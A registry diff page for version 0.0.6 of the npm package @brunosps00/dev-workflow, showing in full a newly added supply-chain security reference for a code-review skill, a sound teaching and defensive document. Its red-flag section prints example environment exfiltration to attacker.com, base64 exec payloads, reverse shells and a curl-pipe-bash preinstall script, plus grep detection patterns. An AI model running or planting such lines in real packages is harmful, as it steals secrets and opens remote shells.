@brunosps00/dev-workflow 0.0.5 → 0.0.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/bin/dev-workflow.js +6 -4
- package/lib/init.js +28 -11
- package/package.json +1 -1
- package/scaffold/pt-br/commands/dw-analyze-project.md +3 -3
- package/scaffold/pt-br/commands/dw-bugfix.md +6 -6
- package/scaffold/pt-br/commands/dw-code-review.md +2 -2
- package/scaffold/pt-br/commands/dw-create-tasks.md +4 -4
- package/scaffold/pt-br/commands/dw-generate-pr.md +3 -3
- package/scaffold/pt-br/commands/dw-help.md +50 -50
- package/scaffold/pt-br/commands/dw-review-implementation.md +3 -3
- package/scaffold/pt-br/commands/dw-run-plan.md +8 -8
- package/scaffold/pt-br/commands/dw-run-task.md +3 -3
- package/scaffold/pt-br/templates/tasks-template.md +2 -2
- package/scaffold/skills/agent-browser/SKILL.md +750 -0
- package/scaffold/skills/agent-browser/references/authentication.md +303 -0
- package/scaffold/skills/agent-browser/references/commands.md +295 -0
- package/scaffold/skills/agent-browser/references/profiling.md +120 -0
- package/scaffold/skills/agent-browser/references/proxy-support.md +194 -0
- package/scaffold/skills/agent-browser/references/session-management.md +193 -0
- package/scaffold/skills/agent-browser/references/snapshot-refs.md +219 -0
- package/scaffold/skills/agent-browser/references/video-recording.md +173 -0
- package/scaffold/skills/agent-browser/templates/authenticated-session.sh +105 -0
- package/scaffold/skills/agent-browser/templates/capture-workflow.sh +69 -0
- package/scaffold/skills/agent-browser/templates/form-automation.sh +62 -0
- package/scaffold/skills/humanizer/README.md +143 -0
- package/scaffold/skills/humanizer/SKILL.md +488 -0
- package/scaffold/skills/humanizer/WARP.md +53 -0
- package/scaffold/skills/remotion-best-practices/SKILL.md +61 -0
- package/scaffold/skills/remotion-best-practices/rules/3d.md +86 -0
- package/scaffold/skills/remotion-best-practices/rules/animations.md +27 -0
- package/scaffold/skills/remotion-best-practices/rules/assets/charts-bar-chart.tsx +173 -0
- package/scaffold/skills/remotion-best-practices/rules/assets/text-animations-typewriter.tsx +100 -0
- package/scaffold/skills/remotion-best-practices/rules/assets/text-animations-word-highlight.tsx +103 -0
- package/scaffold/skills/remotion-best-practices/rules/assets.md +78 -0
- package/scaffold/skills/remotion-best-practices/rules/audio-visualization.md +198 -0
- package/scaffold/skills/remotion-best-practices/rules/audio.md +169 -0
- package/scaffold/skills/remotion-best-practices/rules/calculate-metadata.md +134 -0
- package/scaffold/skills/remotion-best-practices/rules/can-decode.md +75 -0
- package/scaffold/skills/remotion-best-practices/rules/charts.md +120 -0
- package/scaffold/skills/remotion-best-practices/rules/compositions.md +154 -0
- package/scaffold/skills/remotion-best-practices/rules/display-captions.md +184 -0
- package/scaffold/skills/remotion-best-practices/rules/extract-frames.md +229 -0
- package/scaffold/skills/remotion-best-practices/rules/ffmpeg.md +38 -0
- package/scaffold/skills/remotion-best-practices/rules/fonts.md +152 -0
- package/scaffold/skills/remotion-best-practices/rules/get-audio-duration.md +58 -0
- package/scaffold/skills/remotion-best-practices/rules/get-video-dimensions.md +68 -0
- package/scaffold/skills/remotion-best-practices/rules/get-video-duration.md +60 -0
- package/scaffold/skills/remotion-best-practices/rules/gifs.md +141 -0
- package/scaffold/skills/remotion-best-practices/rules/images.md +134 -0
- package/scaffold/skills/remotion-best-practices/rules/import-srt-captions.md +69 -0
- package/scaffold/skills/remotion-best-practices/rules/light-leaks.md +73 -0
- package/scaffold/skills/remotion-best-practices/rules/lottie.md +70 -0
- package/scaffold/skills/remotion-best-practices/rules/maps.md +412 -0
- package/scaffold/skills/remotion-best-practices/rules/measuring-dom-nodes.md +34 -0
- package/scaffold/skills/remotion-best-practices/rules/measuring-text.md +140 -0
- package/scaffold/skills/remotion-best-practices/rules/parameters.md +109 -0
- package/scaffold/skills/remotion-best-practices/rules/sequencing.md +118 -0
- package/scaffold/skills/remotion-best-practices/rules/sfx.md +26 -0
- package/scaffold/skills/remotion-best-practices/rules/subtitles.md +36 -0
- package/scaffold/skills/remotion-best-practices/rules/tailwind.md +11 -0
- package/scaffold/skills/remotion-best-practices/rules/text-animations.md +20 -0
- package/scaffold/skills/remotion-best-practices/rules/timing.md +179 -0
- package/scaffold/skills/remotion-best-practices/rules/transcribe-captions.md +70 -0
- package/scaffold/skills/remotion-best-practices/rules/transitions.md +197 -0
- package/scaffold/skills/remotion-best-practices/rules/transparent-videos.md +106 -0
- package/scaffold/skills/remotion-best-practices/rules/trimming.md +51 -0
- package/scaffold/skills/remotion-best-practices/rules/videos.md +171 -0
- package/scaffold/skills/remotion-best-practices/rules/voiceover.md +99 -0
- package/scaffold/skills/security-review/LICENSE +22 -0
- package/scaffold/skills/security-review/SKILL.md +312 -0
- package/scaffold/skills/security-review/infrastructure/docker.md +432 -0
- package/scaffold/skills/security-review/languages/javascript.md +388 -0
- package/scaffold/skills/security-review/languages/python.md +363 -0
- package/scaffold/skills/security-review/references/api-security.md +519 -0
- package/scaffold/skills/security-review/references/authentication.md +353 -0
- package/scaffold/skills/security-review/references/authorization.md +372 -0
- package/scaffold/skills/security-review/references/business-logic.md +443 -0
- package/scaffold/skills/security-review/references/cryptography.md +329 -0
- package/scaffold/skills/security-review/references/csrf.md +398 -0
- package/scaffold/skills/security-review/references/data-protection.md +378 -0
- package/scaffold/skills/security-review/references/deserialization.md +410 -0
- package/scaffold/skills/security-review/references/error-handling.md +436 -0
- package/scaffold/skills/security-review/references/file-security.md +457 -0
- package/scaffold/skills/security-review/references/injection.md +259 -0
- package/scaffold/skills/security-review/references/logging.md +433 -0
- package/scaffold/skills/security-review/references/misconfiguration.md +435 -0
- package/scaffold/skills/security-review/references/modern-threats.md +475 -0
- package/scaffold/skills/security-review/references/ssrf.md +415 -0
- package/scaffold/skills/security-review/references/supply-chain.md +405 -0
- package/scaffold/skills/security-review/references/xss.md +336 -0
- package/scaffold/skills/vercel-react-best-practices/AGENTS.md +3648 -0
- package/scaffold/skills/vercel-react-best-practices/README.md +123 -0
- package/scaffold/skills/vercel-react-best-practices/SKILL.md +146 -0
- package/scaffold/skills/vercel-react-best-practices/rules/_sections.md +46 -0
- package/scaffold/skills/vercel-react-best-practices/rules/_template.md +28 -0
- package/scaffold/skills/vercel-react-best-practices/rules/advanced-event-handler-refs.md +55 -0
- package/scaffold/skills/vercel-react-best-practices/rules/advanced-init-once.md +42 -0
- package/scaffold/skills/vercel-react-best-practices/rules/advanced-use-latest.md +39 -0
- package/scaffold/skills/vercel-react-best-practices/rules/async-api-routes.md +38 -0
- package/scaffold/skills/vercel-react-best-practices/rules/async-cheap-condition-before-await.md +37 -0
- package/scaffold/skills/vercel-react-best-practices/rules/async-defer-await.md +82 -0
- package/scaffold/skills/vercel-react-best-practices/rules/async-dependencies.md +51 -0
- package/scaffold/skills/vercel-react-best-practices/rules/async-parallel.md +28 -0
- package/scaffold/skills/vercel-react-best-practices/rules/async-suspense-boundaries.md +99 -0
- package/scaffold/skills/vercel-react-best-practices/rules/bundle-barrel-imports.md +60 -0
- package/scaffold/skills/vercel-react-best-practices/rules/bundle-conditional.md +31 -0
- package/scaffold/skills/vercel-react-best-practices/rules/bundle-defer-third-party.md +49 -0
- package/scaffold/skills/vercel-react-best-practices/rules/bundle-dynamic-imports.md +35 -0
- package/scaffold/skills/vercel-react-best-practices/rules/bundle-preload.md +50 -0
- package/scaffold/skills/vercel-react-best-practices/rules/client-event-listeners.md +74 -0
- package/scaffold/skills/vercel-react-best-practices/rules/client-localstorage-schema.md +71 -0
- package/scaffold/skills/vercel-react-best-practices/rules/client-passive-event-listeners.md +48 -0
- package/scaffold/skills/vercel-react-best-practices/rules/client-swr-dedup.md +56 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-batch-dom-css.md +107 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-cache-function-results.md +80 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-cache-property-access.md +28 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-cache-storage.md +70 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-combine-iterations.md +32 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-early-exit.md +50 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-flatmap-filter.md +60 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-hoist-regexp.md +45 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-index-maps.md +37 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-length-check-first.md +49 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-min-max-loop.md +82 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-request-idle-callback.md +105 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-set-map-lookups.md +24 -0
- package/scaffold/skills/vercel-react-best-practices/rules/js-tosorted-immutable.md +57 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rendering-activity.md +26 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rendering-animate-svg-wrapper.md +47 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rendering-conditional-render.md +40 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rendering-content-visibility.md +38 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rendering-hoist-jsx.md +46 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rendering-hydration-no-flicker.md +82 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rendering-hydration-suppress-warning.md +30 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rendering-resource-hints.md +85 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rendering-script-defer-async.md +68 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rendering-svg-precision.md +28 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rendering-usetransition-loading.md +75 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-defer-reads.md +39 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-dependencies.md +45 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-derived-state-no-effect.md +40 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-derived-state.md +29 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-functional-setstate.md +74 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-lazy-state-init.md +58 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-memo-with-default-value.md +38 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-memo.md +44 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-move-effect-to-event.md +45 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-no-inline-components.md +82 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-simple-expression-in-memo.md +35 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-split-combined-hooks.md +64 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-transitions.md +40 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-use-deferred-value.md +59 -0
- package/scaffold/skills/vercel-react-best-practices/rules/rerender-use-ref-transient-values.md +73 -0
- package/scaffold/skills/vercel-react-best-practices/rules/server-after-nonblocking.md +73 -0
- package/scaffold/skills/vercel-react-best-practices/rules/server-auth-actions.md +96 -0
- package/scaffold/skills/vercel-react-best-practices/rules/server-cache-lru.md +41 -0
- package/scaffold/skills/vercel-react-best-practices/rules/server-cache-react.md +76 -0
- package/scaffold/skills/vercel-react-best-practices/rules/server-dedup-props.md +65 -0
- package/scaffold/skills/vercel-react-best-practices/rules/server-hoist-static-io.md +149 -0
- package/scaffold/skills/vercel-react-best-practices/rules/server-parallel-fetching.md +83 -0
- package/scaffold/skills/vercel-react-best-practices/rules/server-parallel-nested-fetching.md +34 -0
- package/scaffold/skills/vercel-react-best-practices/rules/server-serialization.md +38 -0
- package/scaffold/skills/webapp-testing/SKILL.md +133 -0
- package/scaffold/skills/webapp-testing/assets/test-helper.js +56 -0
|
@@ -0,0 +1,405 @@
|
|
|
1
|
+
# Supply Chain Security Reference
|
|
2
|
+
|
|
3
|
+
## Overview
|
|
4
|
+
|
|
5
|
+
Supply chain vulnerabilities occur when attackers compromise dependencies, build systems, or distribution mechanisms. This includes vulnerable dependencies, dependency confusion attacks, compromised build pipelines, and malicious packages.
|
|
6
|
+
|
|
7
|
+
---
|
|
8
|
+
|
|
9
|
+
## Vulnerable Dependencies
|
|
10
|
+
|
|
11
|
+
### Detection Patterns
|
|
12
|
+
|
|
13
|
+
```bash
|
|
14
|
+
# Check for known vulnerabilities
|
|
15
|
+
npm audit
|
|
16
|
+
pip-audit
|
|
17
|
+
cargo audit
|
|
18
|
+
bundle audit
|
|
19
|
+
safety check
|
|
20
|
+
|
|
21
|
+
# Check for outdated packages
|
|
22
|
+
npm outdated
|
|
23
|
+
pip list --outdated
|
|
24
|
+
```
|
|
25
|
+
|
|
26
|
+
### Lock Files
|
|
27
|
+
|
|
28
|
+
```python
|
|
29
|
+
# VULNERABLE: No lock file - versions float
|
|
30
|
+
# requirements.txt
|
|
31
|
+
requests>=2.0
|
|
32
|
+
|
|
33
|
+
# SAFE: Pinned versions with lock file
|
|
34
|
+
# requirements.txt
|
|
35
|
+
requests==2.28.1
|
|
36
|
+
|
|
37
|
+
# Or using pip-tools
|
|
38
|
+
# requirements.in -> requirements.txt (generated, pinned)
|
|
39
|
+
```
|
|
40
|
+
|
|
41
|
+
### Patterns to Flag
|
|
42
|
+
|
|
43
|
+
```json
|
|
44
|
+
// VULNERABLE: No lock file committed
|
|
45
|
+
// Missing: package-lock.json, yarn.lock, Pipfile.lock, Cargo.lock, go.sum
|
|
46
|
+
|
|
47
|
+
// VULNERABLE: Lock file in .gitignore
|
|
48
|
+
// .gitignore
|
|
49
|
+
package-lock.json
|
|
50
|
+
yarn.lock
|
|
51
|
+
|
|
52
|
+
// VULNERABLE: Version ranges that could change
|
|
53
|
+
// package.json
|
|
54
|
+
{
|
|
55
|
+
"dependencies": {
|
|
56
|
+
"lodash": "^4.0.0", // Could get 4.999.0
|
|
57
|
+
"express": "*", // Any version
|
|
58
|
+
"axios": "latest" // Always latest
|
|
59
|
+
}
|
|
60
|
+
}
|
|
61
|
+
```
|
|
62
|
+
|
|
63
|
+
---
|
|
64
|
+
|
|
65
|
+
## Dependency Confusion
|
|
66
|
+
|
|
67
|
+
### Attack Vector
|
|
68
|
+
|
|
69
|
+
Attackers publish malicious packages with the same name as internal packages to public registries. When build systems check public registries first, they may install the malicious version.
|
|
70
|
+
|
|
71
|
+
### Vulnerable Configurations
|
|
72
|
+
|
|
73
|
+
```python
|
|
74
|
+
# VULNERABLE: pip checks PyPI before internal registry
|
|
75
|
+
# pip.conf with both sources but no priority
|
|
76
|
+
[global]
|
|
77
|
+
index-url = https://pypi.org/simple
|
|
78
|
+
extra-index-url = https://internal.company.com/pypi
|
|
79
|
+
|
|
80
|
+
# VULNERABLE: npm checks public registry
|
|
81
|
+
# .npmrc
|
|
82
|
+
registry=https://registry.npmjs.org
|
|
83
|
+
@company:registry=https://npm.company.com
|
|
84
|
+
# Public package "company-utils" could shadow internal one
|
|
85
|
+
```
|
|
86
|
+
|
|
87
|
+
### Mitigations
|
|
88
|
+
|
|
89
|
+
```ini
|
|
90
|
+
# SAFE: Internal registry only for scoped packages
|
|
91
|
+
# .npmrc
|
|
92
|
+
@company:registry=https://npm.company.com
|
|
93
|
+
//npm.company.com/:_authToken=${NPM_TOKEN}
|
|
94
|
+
|
|
95
|
+
# SAFE: pip with explicit index for each package
|
|
96
|
+
# requirements.txt with --index-url per package
|
|
97
|
+
--index-url https://internal.company.com/pypi
|
|
98
|
+
internal-package==1.0.0
|
|
99
|
+
--index-url https://pypi.org/simple
|
|
100
|
+
requests==2.28.1
|
|
101
|
+
```
|
|
102
|
+
|
|
103
|
+
```json
|
|
104
|
+
// SAFE: npm package name claiming (publish placeholder to public)
|
|
105
|
+
// Publish empty package to npmjs.org with same name as internal packages
|
|
106
|
+
{
|
|
107
|
+
"name": "internal-company-package",
|
|
108
|
+
"version": "0.0.0",
|
|
109
|
+
"description": "This package name is reserved"
|
|
110
|
+
}
|
|
111
|
+
```
|
|
112
|
+
|
|
113
|
+
---
|
|
114
|
+
|
|
115
|
+
## Typosquatting
|
|
116
|
+
|
|
117
|
+
### Detection
|
|
118
|
+
|
|
119
|
+
```python
|
|
120
|
+
# VULNERABLE: Misspelled package names
|
|
121
|
+
# requirements.txt
|
|
122
|
+
reqeusts==2.28.0 # Typo of 'requests'
|
|
123
|
+
djando==4.0.0 # Typo of 'django'
|
|
124
|
+
python-nmap # Could be confused with nmap
|
|
125
|
+
|
|
126
|
+
# package.json
|
|
127
|
+
"lodahs": "4.0.0" # Typo of 'lodash'
|
|
128
|
+
"electorn": "1.0.0" # Typo of 'electron'
|
|
129
|
+
```
|
|
130
|
+
|
|
131
|
+
### Common Typosquatting Patterns
|
|
132
|
+
|
|
133
|
+
- Character omission: `requests` → `reqests`
|
|
134
|
+
- Character swap: `django` → `djagno`
|
|
135
|
+
- Character doubling: `numpy` → `numppy`
|
|
136
|
+
- Homoglyphs: `requests` → `rеquests` (Cyrillic е)
|
|
137
|
+
- Adding suffixes: `requests-dev`, `requests-py`
|
|
138
|
+
|
|
139
|
+
---
|
|
140
|
+
|
|
141
|
+
## Build Pipeline Security
|
|
142
|
+
|
|
143
|
+
### Insecure CI/CD Patterns
|
|
144
|
+
|
|
145
|
+
```yaml
|
|
146
|
+
# VULNERABLE: Secrets in plain text
|
|
147
|
+
# .github/workflows/build.yml
|
|
148
|
+
env:
|
|
149
|
+
AWS_SECRET_KEY: AKIAIOSFODNN7EXAMPLE
|
|
150
|
+
|
|
151
|
+
# VULNERABLE: Running arbitrary code from PRs
|
|
152
|
+
on:
|
|
153
|
+
pull_request_target:
|
|
154
|
+
types: [opened]
|
|
155
|
+
jobs:
|
|
156
|
+
build:
|
|
157
|
+
runs-on: ubuntu-latest
|
|
158
|
+
steps:
|
|
159
|
+
- uses: actions/checkout@v3
|
|
160
|
+
with:
|
|
161
|
+
ref: ${{ github.event.pull_request.head.sha }} # Runs untrusted code
|
|
162
|
+
- run: npm install && npm test
|
|
163
|
+
|
|
164
|
+
# VULNERABLE: Using unpinned actions
|
|
165
|
+
steps:
|
|
166
|
+
- uses: actions/checkout@main # Could change maliciously
|
|
167
|
+
- uses: some-action@latest
|
|
168
|
+
```
|
|
169
|
+
|
|
170
|
+
### Secure CI/CD Configuration
|
|
171
|
+
|
|
172
|
+
```yaml
|
|
173
|
+
# SAFE: Pinned action versions with hash
|
|
174
|
+
steps:
|
|
175
|
+
- uses: actions/checkout@8e5e7e5ab8b370d6c329ec480221332ada57f0ab # v3.5.2
|
|
176
|
+
|
|
177
|
+
# SAFE: Secrets from secure storage
|
|
178
|
+
env:
|
|
179
|
+
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
|
|
180
|
+
|
|
181
|
+
# SAFE: Separate workflow for untrusted PRs
|
|
182
|
+
on:
|
|
183
|
+
pull_request: # Not pull_request_target
|
|
184
|
+
jobs:
|
|
185
|
+
build:
|
|
186
|
+
runs-on: ubuntu-latest
|
|
187
|
+
permissions:
|
|
188
|
+
contents: read # Minimal permissions
|
|
189
|
+
```
|
|
190
|
+
|
|
191
|
+
---
|
|
192
|
+
|
|
193
|
+
## Package Integrity
|
|
194
|
+
|
|
195
|
+
### Verify Checksums
|
|
196
|
+
|
|
197
|
+
```bash
|
|
198
|
+
# SAFE: Verify package checksums
|
|
199
|
+
pip install --require-hashes -r requirements.txt
|
|
200
|
+
|
|
201
|
+
# requirements.txt with hashes
|
|
202
|
+
requests==2.28.1 \
|
|
203
|
+
--hash=sha256:7c5599b102feddaa661c826c56ab4fee28bfd17f5abca1ebbe3e7f19d7c97983
|
|
204
|
+
|
|
205
|
+
# npm with integrity
|
|
206
|
+
npm ci # Uses package-lock.json with integrity hashes
|
|
207
|
+
```
|
|
208
|
+
|
|
209
|
+
### Signature Verification
|
|
210
|
+
|
|
211
|
+
```bash
|
|
212
|
+
# Verify GPG signatures
|
|
213
|
+
gpg --verify package.tar.gz.sig package.tar.gz
|
|
214
|
+
|
|
215
|
+
# Go module checksums
|
|
216
|
+
# go.sum contains cryptographic checksums
|
|
217
|
+
go mod verify
|
|
218
|
+
```
|
|
219
|
+
|
|
220
|
+
---
|
|
221
|
+
|
|
222
|
+
## Malicious Package Indicators
|
|
223
|
+
|
|
224
|
+
### Suspicious Patterns in Packages
|
|
225
|
+
|
|
226
|
+
```python
|
|
227
|
+
# RED FLAGS in package code:
|
|
228
|
+
|
|
229
|
+
# Network calls during install
|
|
230
|
+
# setup.py
|
|
231
|
+
import requests
|
|
232
|
+
requests.post('https://attacker.com/data', data=os.environ)
|
|
233
|
+
|
|
234
|
+
# Obfuscated code
|
|
235
|
+
exec(base64.b64decode('aW1wb3J0IG9z...'))
|
|
236
|
+
eval(compile(base64.b64decode(code), '<string>', 'exec'))
|
|
237
|
+
|
|
238
|
+
# Environment variable exfiltration
|
|
239
|
+
os.environ.get('AWS_SECRET_ACCESS_KEY')
|
|
240
|
+
subprocess.run(['env'])
|
|
241
|
+
|
|
242
|
+
# Reverse shells
|
|
243
|
+
socket.socket().connect(('attacker.com', 4444))
|
|
244
|
+
os.system('bash -i >& /dev/tcp/attacker.com/4444 0>&1')
|
|
245
|
+
|
|
246
|
+
# Cryptocurrency miners
|
|
247
|
+
import hashlib
|
|
248
|
+
while True:
|
|
249
|
+
hashlib.sha256(data).hexdigest()
|
|
250
|
+
```
|
|
251
|
+
|
|
252
|
+
### Pre/Post Install Scripts
|
|
253
|
+
|
|
254
|
+
```json
|
|
255
|
+
// package.json - check these scripts carefully
|
|
256
|
+
{
|
|
257
|
+
"scripts": {
|
|
258
|
+
"preinstall": "curl https://attacker.com/script.sh | bash", // DANGEROUS
|
|
259
|
+
"postinstall": "node ./malicious.js", // CHECK THIS
|
|
260
|
+
"prepare": "..."
|
|
261
|
+
}
|
|
262
|
+
}
|
|
263
|
+
```
|
|
264
|
+
|
|
265
|
+
```python
|
|
266
|
+
# setup.py - check for code execution during install
|
|
267
|
+
from setuptools import setup
|
|
268
|
+
from setuptools.command.install import install
|
|
269
|
+
|
|
270
|
+
class PostInstall(install):
|
|
271
|
+
def run(self):
|
|
272
|
+
install.run(self)
|
|
273
|
+
# CHECK WHAT RUNS HERE
|
|
274
|
+
os.system('whoami') # DANGEROUS
|
|
275
|
+
|
|
276
|
+
setup(
|
|
277
|
+
cmdclass={'install': PostInstall}
|
|
278
|
+
)
|
|
279
|
+
```
|
|
280
|
+
|
|
281
|
+
---
|
|
282
|
+
|
|
283
|
+
## Private Registry Security
|
|
284
|
+
|
|
285
|
+
### Misconfiguration
|
|
286
|
+
|
|
287
|
+
```yaml
|
|
288
|
+
# VULNERABLE: Registry credentials in code
|
|
289
|
+
# .npmrc committed to repo
|
|
290
|
+
//registry.npmjs.org/:_authToken=npm_XXXX
|
|
291
|
+
|
|
292
|
+
# VULNERABLE: Unauthenticated internal registry
|
|
293
|
+
registry=http://internal-npm.company.com # No auth, HTTP
|
|
294
|
+
|
|
295
|
+
# VULNERABLE: Pull from any registry
|
|
296
|
+
pip install package # Will check PyPI even for internal names
|
|
297
|
+
```
|
|
298
|
+
|
|
299
|
+
### Secure Configuration
|
|
300
|
+
|
|
301
|
+
```yaml
|
|
302
|
+
# SAFE: Credentials from environment
|
|
303
|
+
# .npmrc
|
|
304
|
+
//registry.npmjs.org/:_authToken=${NPM_TOKEN}
|
|
305
|
+
|
|
306
|
+
# SAFE: Scoped to specific registries
|
|
307
|
+
@company:registry=https://npm.company.com
|
|
308
|
+
//npm.company.com/:_authToken=${INTERNAL_NPM_TOKEN}
|
|
309
|
+
|
|
310
|
+
# SAFE: Internal registry only mode for sensitive builds
|
|
311
|
+
# pip.conf
|
|
312
|
+
[global]
|
|
313
|
+
index-url = https://internal.company.com/pypi
|
|
314
|
+
# No extra-index-url to public registries
|
|
315
|
+
```
|
|
316
|
+
|
|
317
|
+
---
|
|
318
|
+
|
|
319
|
+
## Vendoring Dependencies
|
|
320
|
+
|
|
321
|
+
### When to Vendor
|
|
322
|
+
|
|
323
|
+
```bash
|
|
324
|
+
# Consider vendoring for:
|
|
325
|
+
# - Critical security applications
|
|
326
|
+
# - Air-gapped environments
|
|
327
|
+
# - Reproducible builds
|
|
328
|
+
|
|
329
|
+
# Go vendoring
|
|
330
|
+
go mod vendor
|
|
331
|
+
# Commit vendor/ directory
|
|
332
|
+
|
|
333
|
+
# Python vendoring
|
|
334
|
+
pip download -r requirements.txt -d ./vendor/
|
|
335
|
+
# Install from local: pip install --no-index --find-links=./vendor/ -r requirements.txt
|
|
336
|
+
```
|
|
337
|
+
|
|
338
|
+
---
|
|
339
|
+
|
|
340
|
+
## SBOM (Software Bill of Materials)
|
|
341
|
+
|
|
342
|
+
### Generation
|
|
343
|
+
|
|
344
|
+
```bash
|
|
345
|
+
# Generate SBOM for vulnerability tracking
|
|
346
|
+
# CycloneDX format
|
|
347
|
+
cyclonedx-py --format json -o sbom.json
|
|
348
|
+
|
|
349
|
+
# SPDX format
|
|
350
|
+
syft . -o spdx-json > sbom.spdx.json
|
|
351
|
+
|
|
352
|
+
# npm
|
|
353
|
+
npm sbom --sbom-format cyclonedx
|
|
354
|
+
```
|
|
355
|
+
|
|
356
|
+
---
|
|
357
|
+
|
|
358
|
+
## Grep Patterns for Detection
|
|
359
|
+
|
|
360
|
+
```bash
|
|
361
|
+
# Unpinned dependencies
|
|
362
|
+
grep -rn "\*\|latest\|>=\|~\|^" package.json requirements.txt
|
|
363
|
+
|
|
364
|
+
# Missing lock files
|
|
365
|
+
ls package-lock.json yarn.lock Pipfile.lock Cargo.lock go.sum 2>/dev/null
|
|
366
|
+
|
|
367
|
+
# Credentials in config
|
|
368
|
+
grep -rn "_authToken\|registry.*token\|password" .npmrc .pypirc pip.conf
|
|
369
|
+
|
|
370
|
+
# Suspicious install scripts
|
|
371
|
+
grep -rn "preinstall\|postinstall\|prepare" package.json
|
|
372
|
+
|
|
373
|
+
# Obfuscated code in dependencies
|
|
374
|
+
grep -rn "eval(.*base64\|exec(.*decode\|compile(.*decode" node_modules/ site-packages/
|
|
375
|
+
|
|
376
|
+
# Network calls in setup.py
|
|
377
|
+
grep -rn "requests\|urllib\|socket" setup.py
|
|
378
|
+
|
|
379
|
+
# Unpinned GitHub Actions
|
|
380
|
+
grep -rn "uses:.*@main\|uses:.*@master\|uses:.*@latest" .github/workflows/
|
|
381
|
+
```
|
|
382
|
+
|
|
383
|
+
---
|
|
384
|
+
|
|
385
|
+
## Testing Checklist
|
|
386
|
+
|
|
387
|
+
- [ ] All dependencies pinned to exact versions
|
|
388
|
+
- [ ] Lock files committed and not in .gitignore
|
|
389
|
+
- [ ] Dependencies scanned for known vulnerabilities
|
|
390
|
+
- [ ] Internal packages use scoped names or claimed on public registries
|
|
391
|
+
- [ ] CI/CD actions pinned to commit hashes
|
|
392
|
+
- [ ] Secrets not hardcoded in CI/CD configs
|
|
393
|
+
- [ ] Package integrity verified (checksums/signatures)
|
|
394
|
+
- [ ] Pre/post install scripts reviewed
|
|
395
|
+
- [ ] Private registry credentials not in code
|
|
396
|
+
- [ ] SBOM generated for production dependencies
|
|
397
|
+
|
|
398
|
+
---
|
|
399
|
+
|
|
400
|
+
## References
|
|
401
|
+
|
|
402
|
+
- [OWASP Dependency Check](https://owasp.org/www-project-dependency-check/)
|
|
403
|
+
- [SLSA Framework](https://slsa.dev/)
|
|
404
|
+
- [CWE-1104: Use of Unmaintained Third Party Components](https://cwe.mitre.org/data/definitions/1104.html)
|
|
405
|
+
- [Dependency Confusion Attack](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
|